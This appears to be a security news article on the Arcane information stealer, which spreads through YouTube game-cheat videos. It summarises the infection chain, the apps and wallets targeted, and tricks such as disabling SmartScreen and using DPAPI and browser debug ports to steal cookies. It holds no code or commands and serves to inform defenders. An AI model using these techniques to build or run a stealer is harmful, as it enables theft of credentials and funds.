Arcane Stealer Malware Spread via YouTube Game Cheat Videos

A new cybersecurity threat has surfaced, leveraging YouTube videos that promote game cheats to distribute a previously undocumented information-stealing malware known as Arcane. This campaign appears to be primarily targeting Russian-speaking users, and according to cybersecurity firm Kaspersky, it demonstrates a concerning level of sophistication in both execution and data collection.

Attack Chain Breakdown

The delivery method of the Arcane stealer is deceptively simple but highly effective. Threat actors upload YouTube videos advertising downloadable game cheats. These videos include links to password-protected archive files, which users are encouraged to download.

Once the archive is opened, it contains a batch script named start.bat, which initiates a PowerShell command to retrieve another compressed archive. This second archive contains two key executables, and the batch script also disables Windows SmartScreen protection and modifies SmartScreen filter exceptions across drive root folders.

Dual Payload Delivery

The downloaded archive includes two binaries:

• A cryptocurrency miner that hijacks system resources.

• A stealer malware, originally a variant known as VGS (linked to the Phemedrone Stealer family). As of November 2024, this payload has been replaced with Arcane, a new and notably extensive data-harvesting tool.

Arcane’s Capabilities

Arcane's distinguishing feature is the sheer volume and variety of data it collects. According to Kaspersky's analysis, Arcane steals login credentials, passwords, cookies, credit card information, and much more from both system files and installed applications. It targets:

Browsers

• Chromium-based (e.g., Chrome, Brave)

• Gecko-based (e.g., Firefox)

VPN Clients

• OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, ProtonVPN, hidemy.name, PIA, CyberGhost, ExpressVPN

Network Utilities

• ngrok, Playit, Cyberduck, FileZilla, DynDNS

Messaging Applications

• ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, Viber

Email Clients

• Microsoft Outlook

Gaming Platforms

• Riot Client, Epic Games, Steam, Ubisoft Connect, Roblox, Battle.net, Minecraft variants

Cryptocurrency Wallets

• Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, Coinomi

In addition to application-specific data, Arcane can:

• Take screenshots of the desktop

• Enumerate running processes

• List Wi-Fi networks and stored passwords

• Extract browser encryption keys

Cracking Browser Encryption

A particularly advanced aspect of Arcane is its use of the Windows Data Protection API (DPAPI) to access encrypted browser data such as saved logins and cookies. However, Arcane goes further by deploying a utility named Xaitax, which is dropped and executed silently on the infected machine. Xaitax cracks browser keys by extracting the required information from its own console output, making the process more reliable and evasive.

Furthermore, Arcane employs a method of launching Chromium browsers through a debug port to extract cookies independently, bypassing some traditional security mechanisms.

Emerging Loader Threat: ArcanaLoader

In a further evolution of the campaign, the attackers have introduced a new component: ArcanaLoader. Masquerading as a tool for downloading game cheats, ArcanaLoader instead serves as a delivery mechanism for the Arcane stealer.

Kaspersky researchers note that the campaign’s geographic focus is on Russia, Belarus, and Kazakhstan, though similar techniques could easily spread to a wider audience.

Key Takeaways

This campaign illustrates several important points about modern cyber threats:

• Cybercriminals are highly adaptive, constantly changing their distribution tactics and payloads.

• YouTube, a trusted platform for millions, is being manipulated to serve malicious files under the guise of harmless content.

• Arcane is particularly dangerous because of its broad targeting scope, from communication tools and crypto wallets to gaming services and system credentials.

Final Thoughts

The Arcane stealer demonstrates the growing complexity of malware campaigns and the ingenuity of threat actors in blending social engineering with technical sophistication. Users are advised to avoid downloading files from untrusted sources, especially those promising game cheats or similar tools, and to keep all antivirus and endpoint protection software up to date.